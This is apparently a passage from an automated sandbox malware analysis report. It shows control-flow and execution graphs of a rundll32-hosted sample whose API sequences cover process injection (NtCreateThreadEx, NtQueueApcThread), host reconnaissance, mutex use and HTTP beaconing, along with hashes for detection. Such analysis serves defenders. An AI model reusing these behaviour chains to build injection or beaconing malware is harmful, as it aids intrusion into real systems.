2339fb84d3d 17487 2339fbb4ff0 17484->17487 17485->17484 17486 2339fbb444e NtCreateThreadEx 17485->17486 17486->17484 17489 2339fbb5011 17487->17489 17488 2339fbb506c 17488->17482 17489->17488 17490 2339fbb506a NtQueueApcThread 17489->17490 17490->17488 17495 2339fbb4be0 17497 2339fbb4c02 17495->17497 17496 2339fbb4c5e 17497->17496 17498 2339fbb4c5c NtProtectVirtualMemory 17497->17498 17498->17496 17491 2339fbb3f40 17492 2339fbb3f69 17491->17492 17493 2339fbb3fc9 17492->17493 17494 2339fbb3fc7 NtAllocateVirtualMemory 17492->17494 17494->17493

                                                                    Executed Functions

                                                                    Function 000002339FBA4D00 Relevance: 10.8, APIs: 7, Instructions: 282COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 73 2339fba4d00-2339fba4daf GetUserNameW GetComputerNameExW 74 2339fba4db1-2339fba4dc1 call 2339fbab4c0 73->74 75 2339fba4dc7-2339fba4df1 GetComputerNameExW call 2339fbb4ad0 73->75 74->75 80 2339fba4df3-2339fba4e1a GetTokenInformation 75->80 81 2339fba4e58-2339fba4e92 call 2339fbb2750 call 2339fb9dfc0 75->81 82 2339fba4e4e-2339fba4e53 call 2339fbb4000 80->82 83 2339fba4e1c-2339fba4e28 80->83 95 2339fba4e94-2339fba4ea5 call 2339fbb3de0 81->95 96 2339fba4eaa-2339fba4ed1 GetNativeSystemInfo 81->96 82->81 86 2339fba4e3e-2339fba4e49 call 2339fbb3de0 83->86 87 2339fba4e2a-2339fba4e39 call 2339fbb3de0 83->87 86->82 87->86 95->96 97 2339fba4ed3-2339fba4ee6 96->97 98 2339fba4ee8-2339fba4eec 96->98 100 2339fba4f01-2339fba4f15 call 2339fbb3de0 97->100 101 2339fba4eee-2339fba4efd 98->101 102 2339fba4f17-2339fba4f2d call 2339fbb3de0 98->102 106 2339fba4f32-2339fba4f42 100->106 101->100 102->106 108 2339fba4f44-2339fba4f84 call 2339fbb3b90 call 2339fbb3de0 call 2339fbb3b90 * 2 106->108 109 2339fba4f89-2339fba4fb9 GetAdaptersInfo 106->109 108->109 113 2339fba4fdd-2339fba4fe3 109->113 114 2339fba4fbb-2339fba4fdc call 2339fbab4e0 * 2 109->114 113->114 117 2339fba4fe5-2339fba4ffd call 2339fbab4c0 GetAdaptersInfo 113->117 117->114 127 2339fba4fff-2339fba500c 117->127 128 2339fba5012-2339fba5015 127->128 128->114 129 2339fba5017-2339fba5018 128->129 130 2339fba501f-2339fba5031 call 2339fb893e0 129->130 133 2339fba5045-2339fba504c 130->133 134 2339fba5033-2339fba5043 call 2339fbb3de0 130->134 133->114 136 2339fba5052-2339fba5062 call 2339fbb3de0 133->136 134->130 136->128
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                    • String ID:
                                                                    • API String ID: 1596153048-0
                                                                    • Opcode ID: b4a5e0236bac0c4c2e8552285ec6fab632a05024464198d8cdfc8c48a7dd2179
                                                                    • Instruction ID: 5686da3bbe50c0b29a819bdb88573a0bd57d5cd192e2c82d144cad94f06c9752
                                                                    • Opcode Fuzzy Hash: b4a5e0236bac0c4c2e8552285ec6fab632a05024464198d8cdfc8c48a7dd2179
                                                                    • Instruction Fuzzy Hash: 36A19230218B48CFFB54EF14D85A7DAB7E5FB94301F50452EA84AC3291DAB9DB45CB82
                                                                    Function 00007DF445320100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2517442230.00007DF445320000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF445320000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_7df445320000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSnapshotToolhelp32
                                                                    • String ID: @
                                                                    • API String ID: 3332741929-2766056989
                                                                    • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction ID: 6af411fc291a859c575e757d401ec96882a704049941a2073ec1cebc37dc1e54
                                                                    • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction Fuzzy Hash: BF71D031614A4C8FEF94EF5CD898BA977E1FB98315F104226E81ED72A0DB74D954CB80
                                                                    Function 000002339FB81600 Relevance: 1.7, APIs: 1, Instructions: 169threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitThreadUser
                                                                    • String ID:
                                                                    • API String ID: 3424019298-0
                                                                    • Opcode ID: 7ef7c9c0f28628f573ade4330c203e0d9ad1a1cad18026d23a2ad19552d955a8
                                                                    • Instruction ID: 3d167acb752390c9311dc40ce49afa8c9b436bdfca28fefc055fb0de9ff0dc53
                                                                    • Opcode Fuzzy Hash: 7ef7c9c0f28628f573ade4330c203e0d9ad1a1cad18026d23a2ad19552d955a8
                                                                    • Instruction Fuzzy Hash: 7851E374118A088FE758EF28DC597B577E1FB96312F10025DE49BC32A2CE78EA42CB45
                                                                    Function 000002339FC7D2B6 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2115172916.000002339FC40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002339FC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_2339fc40000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                    • Instruction ID: 4b6e30d524ef097b1fd82270a431a7be9e48cc02120947754686f15316bb971e
                                                                    • Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                    • Instruction Fuzzy Hash: F6F0A4B0618B408BE744DF1C84C963577E1FBD8756F24852EE889C7361CB359942CB43
                                                                    Function 000002339FC7D326 Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2115172916.000002339FC40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002339FC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_2339fc40000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                    • Instruction ID: 566e1706118471ac357f8440e9d46c70c4c2025ce62271709aae350d634195c9
                                                                    • Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                    • Instruction Fuzzy Hash: 75F05470A24F448BD704EF2C884A67577E1F7E8646F54462EA448D7361DB35E6428B43
                                                                    Function 000002339FB87830 Relevance: 10.8, APIs: 7, Instructions: 340networkmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 2339fb87830-2339fb87883 1 2339fb87885-2339fb87888 0->1 2 2339fb8788a-2339fb87892 InternetOpenW 0->2 1->2 3 2339fb87898-2339fb878d7 InternetConnectW 2->3 4 2339fb87af9-2339fb87afd 2->4 3->4 6 2339fb878dd-2339fb8792b HttpOpenRequestW 3->6 5 2339fb87aff-2339fb87b0c 4->5 8 2339fb87b0e-2339fb87b11 InternetCloseHandle 5->8 9 2339fb87b17-2339fb87b1a 5->9 6->5 7 2339fb87931-2339fb8793b 6->7 12 2339fb8793d-2339fb87945 7->12 13 2339fb87990-2339fb879ab 7->13 8->9 10 2339fb87b1c-2339fb87b1d 9->10 11 2339fb87b25-2339fb87b28 9->11 10->11 15 2339fb87b33-2339fb87b3b 11->15 16 2339fb87b2a-2339fb87b2b 11->16 12->13 14 2339fb87947-2339fb8798b call 2339fbb2750 * 2 12->14 13->5 24 2339fb879b1-2339fb879ba 13->24 14->13 18 2339fb87bd0-2339fb87be3 15->18 19 2339fb87b41-2339fb87b4b 15->19 16->15 22 2339fb87b4d-2339fb87b54 call 2339fbb1230 19->22 23 2339fb87b62-2339fb87b73 19->23 22->23 38 2339fb87b56-2339fb87b60 call 2339fbab4e0 22->38 26 2339fb87b75-2339fb87b78 23->26 27 2339fb87b7a-2339fb87b8a call 2339fb8cb60 23->27 28 2339fb879bc-2339fb879de call 2339fbb1270 HttpSendRequestA 24->28 29 2339fb879e6-2339fb87a0a 24->29 26->18 26->27 40 2339fb87b8c-2339fb87bb8 call 2339fb8a050 call 2339fbab4e0 27->40 41 2339fb87bba-2339fb87bce call 2339fbb1410 27->41 28->5 39 2339fb879e4-2339fb87a16 28->39 42 2339fb87a0c 29->42 38->18 50 2339fb87a24-2339fb87a3b call 2339fbab4c0 39->50 51 2339fb87a18-2339fb87a1f call 2339fbab4e0 39->51 40->18 41->18 41->38 42->28 58 2339fb87a3f-2339fb87a5b InternetQueryDataAvailable 50->58 51->50 59 2339fb87a61-2339fb87a69 58->59 60 2339fb87ae3-2339fb87af7 call 2339fbab4e0 58->60 59->60 62 2339fb87a6b-2339fb87a7e 59->62 60->8 62->60 65 2339fb87a80-2339fb87a86 62->65 65->60 66 2339fb87a88-2339fb87a96 65->66 67 2339fb87aac-2339fb87aaf call 2339fbab4c0 66->67 68 2339fb87a98-2339fb87aaa RtlReAllocateHeap 66->68 69 2339fb87ab4-2339fb87ade call 2339fba44a0 67->69 68->69 69->58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
                                                                    • String ID:
                                                                    • API String ID: 3737532752-0
                                                                    • Opcode ID: 94ca3a7f2240a7e3a39715367db890fc47f045d7b6bd3e5cd3a95549bb2bf3ea
                                                                    • Instruction ID: 56d77109cfa42ad4299829747ebd29ed522ba65d7a54e5d4a49ef8b2e88c2af7
                                                                    • Opcode Fuzzy Hash: 94ca3a7f2240a7e3a39715367db890fc47f045d7b6bd3e5cd3a95549bb2bf3ea
                                                                    • Instruction Fuzzy Hash: 08B1E231218B09CFF754EF18D8597AAB7D5FBD8305F140569A85AC3291DFB8DB018782
                                                                    Function 00007DF445320000 Relevance: 6.1, APIs: 4, Instructions: 88processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2517442230.00007DF445320000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF445320000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_7df445320000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 1083639309-0
                                                                    • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction ID: 7a1a0ad789c40a59363c6cf998765d52a08cb1f386e6b98b8b0ef089eff72f19
                                                                    • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction Fuzzy Hash: AD21DC3061494C8FEFA1EB5CDC58BEA73E1FBA8310F404226D41EDB290EE75EA488750
                                                                    Function 000002339FB88ED0 Relevance: 1.9, APIs: 1, Instructions: 410synchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMutex
                                                                    • String ID:
                                                                    • API String ID: 1964310414-0
                                                                    • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction ID: 69a516602728c87cc69faaf9f3a88097f1f0e6dd8417b54b493207a83ddbc8d1
                                                                    • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction Fuzzy Hash: 9FE12E71508A0D8FE751EF14E895BE6BBF4F768341F20067BE84AC2261DB789345CB86
                                                                    Function 000002339FB8CCE0 Relevance: 1.6, APIs: 1, Instructions: 114libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID:
                                                                    • API String ID: 3653107232-0
                                                                    • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction ID: 4703a2ce0ae6403762beec4f616ebeeb18ffe6c2df797e6e923df6f6813fe596
                                                                    • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction Fuzzy Hash: CF31B7B1218B088BD764EF08DC4A7BAB7E4FB85311F50061EE586C3252D674AB4687C7
                                                                    Function 000002339FBAB4E0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 283 2339fbab4e0-2339fbab4ee 284 2339fbab4f0-2339fbab505 283->284 285 2339fbab523-2339fbab52f 283->285 284->285 287 2339fbab507-2339fbab51d call 2339fba4ce0 RtlFreeHeap 284->287 287->285
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4536747613.000002339FB81000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002339FB81000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_2339fb81000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction ID: 6c1224a92e8209fb0e348f59a355400563e7404071c08fef3c5e76153ec7c8dd
                                                                    • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction Fuzzy Hash: 20F01C30310A08CBFB58EBBAECD976137E2FB9C342B448155A415C61A5EB78DA51C701
                                                                    Function 000002339FC7CA56 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000003.2115172916.000002339FC40000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002339FC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_3_2339fc40000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction ID: 1d20976c0cc6972192811cf73650fb138559e5b157f36d0304009d22a25d3e71
                                                                    • Opcode Fuzzy Hash: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction Fuzzy Hash: 0C012D31219B1B4BE7D9E76D78C47A276C2F7D4313F588055DC08C7285D868CB414744

                                                                    Execution Graph

                                                                    Execution Coverage:3.1%
                                                                    Dynamic/Decrypted Code Coverage:52%
                                                                    Signature Coverage:5.1%
                                                                    Total number of Nodes:1156
                                                                    Total number of Limit Nodes:42
                                                                    execution_graph 66904 e455cf0 66905 e455d01 66904->66905 66906 e455d7c 66904->66906 66905->66906 66913 e457708 GetTempPathA 66905->66913 66908 e455d10 CopyFileA 66908->66906 66909 e455d25 66908->66909 66910 e455d71 DeleteFileA 66909->66910 66918 e4a7ee8 66909->66918 66910->66906 66912 e455d65 66912->66910 66914 e457733 lstrcatA lstrlenA 66913->66914 66915 e45774f 66913->66915 66914->66915 66916 e457896 lstrcatA lstrlenA 66915->66916 66917 e45785e wsprintfA 66915->66917 66916->66908 66917->66916 66919 e4a7f16 _cwprintf_s_l 66918->66919 66921 e4a7f1a _cwprintf_s_l 66919->66921 66922 e4a8124 _cwprintf_s_l 66919->66922 66926 e4a815a 66919->66926 66928 e4acff8 CloseHandle 66919->66928 66929 e47c5f4 CloseHandle _cwprintf_s_l 66919->66929 66930 e47a968 CloseHandle 66919->66930 66921->66912 66922->66921 66931 e47a968 CloseHandle 66922->66931 66932 e47a968 CloseHandle 66926->66932 66928->66919 66929->66919 66930->66919 66931->66921 66932->66922 66933 30343c4 66938 30341b4 66933->66938 66935 30343cd 66936 30343eb 66935->66936 66959 303c704 NtDelayExecution 66935->66959 66939 30341d4 66938->66939 66960 3036cb4 66939->66960 66941 30341d9 66942 30341fa GetCurrentProcess IsWow64Process 66941->66942 66944 30341dd 66941->66944 66943 3034227 66942->66943 66942->66944 66972 3037274 GetAdaptersInfo 66943->66972 66944->66935 66946 303422c 66946->66944 66947 3034266 CreateMutexW 66946->66947 66947->66944 66948 3034286 GetLastError 66947->66948 66948->66944 66949 30342ac GetModuleHandleW 66948->66949 66979 3034c2c GetModuleHandleW GetCurrentProcessId 66949->66979 66956 30342ec CreateThread 66957 3034317 66956->66957 67482 30343f4 66956->67482 67002 3036c6c CreateThread 66957->67002 66959->66935 66961 3036cbd 66960->66961 66962 3036cf3 66961->66962 67004 303abe8 GetProcAddress GetProcAddressForCaller 66961->67004 66962->66941 66964 3036ccf 66964->66962 67005 30399d0 GetProcAddress GetProcAddressForCaller 66964->67005 66966 3036cd8 66966->66962 67006 303aa0c 66966->67006 66970 3036cea 66970->66962 67011 303b2a4 GetProcAddress GetProcAddressForCaller 66970->67011 66973 30372ad 66972->66973 66975 30372d1 66972->66975 67012 303b388 NtAllocateVirtualMemory 66973->67012 66976 30372df 66975->66976 67014 30382b4 66975->67014 66976->66946 66977 30372b8 GetAdaptersInfo 66977->66975 67017 30382f4 66979->67017 66983 3034c7f 66985 3034d17 GetCurrentProcessId 66983->66985 66986 3034cf3 66983->66986 66987 3034d33 66983->66987 66985->66983 66986->66983 67027 303891c RtlGetVersion GetVersionExW 66986->67027 66988 3034d44 66987->66988 66989 30342c1 66987->66989 67028 3034d58 CloseHandle 66988->67028 66989->66944 66991 3037314 66989->66991 66992 303b388 NtAllocateVirtualMemory 66991->66992 66993 303732c 66992->66993 67057 303bfc0 66993->67057 66995 303737f 66996 303bfc0 NtAllocateVirtualMemory 66995->66996 66997 30342d1 66996->66997 66997->66944 66998 30371f0 66997->66998 66999 3037208 66998->66999 67000 303bfc0 NtAllocateVirtualMemory 66999->67000 67001 30342e1 67000->67001 67001->66944 67001->66956 67003 3036ca3 67002->67003 67060 3035a64 67002->67060 67003->66944 67004->66964 67005->66966 67007 303ab3d 67006->67007 67008 303a8e0 7 API calls 67007->67008 67009 3036ce1 67007->67009 67008->67007 67009->66962 67010 3039350 GetProcAddress GetProcAddressForCaller 67009->67010 67010->66970 67011->66962 67013 303b3c8 67012->67013 67013->66977 67015 30382ef 67014->67015 67016 30382ce NtFreeVirtualMemory 67014->67016 67015->66976 67016->67015 67029 3038c30 67017->67029 67022 3038d3c 67055 303b470 67022->67055 67025 3038d87 67025->66983 67026 3038d6e wsprintfA 67026->67025 67027->66986 67028->66989 67030 3038c4e 67029->67030 67031 3038c60 FindFirstVolumeW 67030->67031 67032 3038c81 GetVolumeInformationW FindVolumeClose 67031->67032 67033 30382fd 67031->67033 67032->67033 67034 3038e18 67033->67034 67035 3038e41 67034->67035 67044 3038fc8 67035->67044 67037 3034c73 67037->67022 67039 303b388 NtAllocateVirtualMemory 67040 3038e63 67039->67040 67041 3038e91 67040->67041 67049 303be64 67040->67049 67043 30382b4 NtFreeVirtualMemory 67041->67043 67043->67037 67045 303b388 NtAllocateVirtualMemory 67044->67045 67046 3038fe4 67045->67046 67047 3038e4b 67046->67047 67053 3038ec8 wsprintfA 67046->67053 67047->67037 67047->67039 67050 303be7c 67049->67050 67054 303beac NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 67050->67054 67052 303bea5 67052->67041 67053->67047 67054->67052 67056 3038d5a GetUserNameA 67055->67056 67056->67025 67056->67026 67058 303b388 NtAllocateVirtualMemory 67057->67058 67059 303bfdc 67058->67059 67059->66995 67062 3035aed 67060->67062 67097 3035b5a new[] 67062->67097 67164 303c704 NtDelayExecution 67062->67164 67063 3035ba7 67064 303b388 NtAllocateVirtualMemory 67064->67097 67066 303c704 NtDelayExecution 67100 3035c2f new[] 67066->67100 67068 30382b4 NtFreeVirtualMemory 67068->67097 67069 303bfc0 NtAllocateVirtualMemory 67069->67100 67070 3036404 wsprintfA 67070->67100 67071 3036025 wsprintfA 67071->67097 67072 3035f36 wsprintfA 67072->67097 67073 303bfc0 NtAllocateVirtualMemory 67073->67097 67075 30382b4 NtFreeVirtualMemory 67075->67097 67076 303be64 3 API calls 67076->67097 67078 303b388 NtAllocateVirtualMemory 67080 3036187 WideCharToMultiByte 67078->67080 67079 303b388 NtAllocateVirtualMemory 67082 3036243 WideCharToMultiByte 67079->67082 67083 303be64 3 API calls 67080->67083 67081 303b388 NtAllocateVirtualMemory 67085 30362ff WideCharToMultiByte 67081->67085 67086 303be64 3 API calls 67082->67086 67083->67100 67084 3036fc0 NtAllocateVirtualMemory 67084->67100 67087 303be64 3 API calls 67085->67087 67086->67100 67087->67100 67089 30382b4 NtFreeVirtualMemory 67089->67100 67090 30382b4 NtFreeVirtualMemory 67090->67097 67093 30369a2 GetExitCodeThread 67093->67100 67095 30369de GetExitCodeThread 67095->67100 67096 303b388 NtAllocateVirtualMemory 67096->67100 67097->67063 67097->67064 67097->67073 67097->67076 67097->67090 67097->67100 67101 3035484 InternetCrackUrlA NtFreeVirtualMemory NtAllocateVirtualMemory 67097->67101 67102 3038424 67097->67102 67128 303b770 67097->67128 67136 3036fc0 NtAllocateVirtualMemory 67097->67136 67137 3034e28 67097->67137 67153 3036cfc NtAllocateVirtualMemory 67097->67153 67154 3035734 67097->67154 67165 3038bdc GetCursorPos GetTickCount RtlRandom 67097->67165 67099 303be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 67099->67100 67100->67066 67100->67068 67100->67069 67100->67070 67100->67071 67100->67072 67100->67075 67100->67078 67100->67079 67100->67081 67100->67084 67100->67089 67100->67093 67100->67095 67100->67096 67100->67097 67100->67099 67166 3038bdc GetCursorPos GetTickCount RtlRandom 67100->67166 67101->67097 67103 303b388 NtAllocateVirtualMemory 67102->67103 67104 3038452 67103->67104 67105 3038466 GetAdaptersInfo 67104->67105 67106 303845f 67104->67106 67107 303865b 67105->67107 67108 303848d 67105->67108 67106->67097 67110 3038688 67107->67110 67112 30382b4 NtFreeVirtualMemory 67107->67112 67109 303b388 NtAllocateVirtualMemory 67108->67109 67111 3038498 GetAdaptersInfo 67109->67111 67113 303b388 NtAllocateVirtualMemory 67110->67113 67114 30384c5 67111->67114 67112->67110 67115 303869b 67113->67115 67119 30384e6 wsprintfA 67114->67119 67115->67106 67116 30386ac GetComputerNameExA 67115->67116 67117 3038729 GetComputerNameExA 67116->67117 67121 30386c5 67116->67121 67118 30387db 67117->67118 67123 3038746 67117->67123 67120 30382b4 NtFreeVirtualMemory 67118->67120 67124 3038502 67119->67124 67120->67106 67122 30386fa wsprintfA 67121->67122 67122->67117 67125 30387a6 wsprintfA 67123->67125 67124->67107 67126 3038627 wsprintfA 67124->67126 67127 30385b2 wsprintfA 67124->67127 67125->67118 67126->67107 67126->67124 67127->67124 67130 303b7aa 67128->67130 67129 303b7b5 67129->67100 67130->67129 67132 303b7f0 67130->67132 67167 303c00c NtAllocateVirtualMemory 67130->67167 67134 303b822 67132->67134 67168 303c00c NtAllocateVirtualMemory 67132->67168 67134->67129 67169 303c00c NtAllocateVirtualMemory 67134->67169 67136->67097 67151 3034e5d 67137->67151 67139 3034d78 InternetOpenW InternetConnectA 67141 3034ec6 67139->67141 67140 30382b4 NtFreeVirtualMemory 67140->67141 67141->67139 67141->67140 67142 3034fc6 67141->67142 67143 303bfc0 NtAllocateVirtualMemory 67141->67143 67141->67151 67145 3035057 67142->67145 67146 303504c InternetCloseHandle 67142->67146 67143->67141 67147 303506a 67145->67147 67148 303505f InternetCloseHandle 67145->67148 67146->67145 67147->67097 67148->67147 67149 30382b4 NtFreeVirtualMemory 67149->67151 67150 3035022 67150->67142 67151->67141 67151->67142 67151->67149 67151->67150 67170 3035484 InternetCrackUrlA NtFreeVirtualMemory NtAllocateVirtualMemory 67151->67170 67171 3035078 67151->67171 67176 3035160 8 API calls 67151->67176 67153->67097 67155 3035792 67154->67155 67156 303bfc0 NtAllocateVirtualMemory 67155->67156 67162 30357b3 67156->67162 67157 30357c0 67157->67100 67159 3035a49 67160 30382b4 NtFreeVirtualMemory 67159->67160 67160->67157 67162->67157 67162->67159 67184 30344c8 67162->67184 67225 303cf4c NtFreeVirtualMemory 67162->67225 67226 303cde8 NtFreeVirtualMemory NtAllocateVirtualMemory 67162->67226 67164->67062 67165->67097 67166->67100 67167->67132 67168->67134 67169->67129 67170->67151 67172 30350bc InternetReadFile 67171->67172 67173 3035104 67172->67173 67175 30350de 67172->67175 67173->67141 67175->67172 67175->67173 67177 303b704 67175->67177 67176->67151 67178 303b733 67177->67178 67179 303b718 67177->67179 67183 303b648 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 67178->67183 67180 30382b4 NtFreeVirtualMemory 67179->67180 67182 303b725 67180->67182 67182->67175 67183->67182 67196 30344ec 67184->67196 67185 30347e3 67187 3034900 67185->67187 67188 30347ee 67185->67188 67186 3034799 67189 3034852 67186->67189 67190 30347a4 67186->67190 67241 3034334 SetEvent ReleaseMutex CloseHandle 67187->67241 67200 303480f 67188->67200 67201 30349ec 67188->67201 67207 30347de 67188->67207 67199 303bfc0 NtAllocateVirtualMemory 67189->67199 67192 30347af 67190->67192 67193 303494c 67190->67193 67197 3034931 67192->67197 67198 30347ba 67192->67198 67245 3032b28 8 API calls 67193->67245 67195 3034905 67202 3034839 67195->67202 67242 303c704 NtDelayExecution 67195->67242 67196->67185 67196->67186 67244 3032d50 18 API calls 67197->67244 67203 3034942 67198->67203 67204 30347c5 67198->67204 67223 3034870 67199->67223 67211 303481a 67200->67211 67212 30349f8 67200->67212 67228 3037dfc 67201->67228 67202->67207 67227 303321c CreateThread 67203->67227 67208 303483e 67204->67208 67209 30347cc 67204->67209 67207->67162 67240 3037940 30 API calls 67208->67240 67214 30347d7 67209->67214 67215 303491d 67209->67215 67211->67207 67247 3034a20 25 API calls 67211->67247 67212->67207 67216 3034a02 67212->67216 67214->67207 67218 303482a 67214->67218 67243 3037768 33 API calls 67215->67243 67246 3037f54 23 API calls 67216->67246 67239 3037c98 24 API calls 67218->67239 67223->67207 67224 30382b4 NtFreeVirtualMemory 67223->67224 67224->67207 67225->67162 67226->67162 67227->67207 67248 3033304 67227->67248 67229 3037e17 67228->67229 67230 3037e24 MultiByteToWideChar 67229->67230 67402 3037a84 67230->67402 67232 3037f40 67232->67207 67234 303b388 NtAllocateVirtualMemory 67235 3037eb6 67234->67235 67236 303b388 NtAllocateVirtualMemory 67235->67236 67237 3037ed9 CreateThread 67236->67237 67238 30382b4 NtFreeVirtualMemory 67237->67238 67461 303bb44 67237->67461 67238->67232 67239->67202 67240->67207 67241->67195 67242->67195 67243->67207 67244->67202 67245->67202 67246->67207 67247->67207 67249 3033349 67248->67249 67304 3033322 67248->67304 67250 303b388 NtAllocateVirtualMemory 67249->67250 67251 3033353 67250->67251 67251->67304 67366 3032164 67251->67366 67253 3033406 67254 3032164 21 API calls 67253->67254 67255 303349e 67254->67255 67256 3032164 21 API calls 67255->67256 67257 3033537 67256->67257 67258 3032164 21 API calls 67257->67258 67259 30335d0 67258->67259 67260 3032164 21 API calls 67259->67260 67261 3033669 67260->67261 67262 3032164 21 API calls 67261->67262 67263 3033702 67262->67263 67264 3032164 21 API calls 67263->67264 67265 303379b 67264->67265 67266 3032164 21 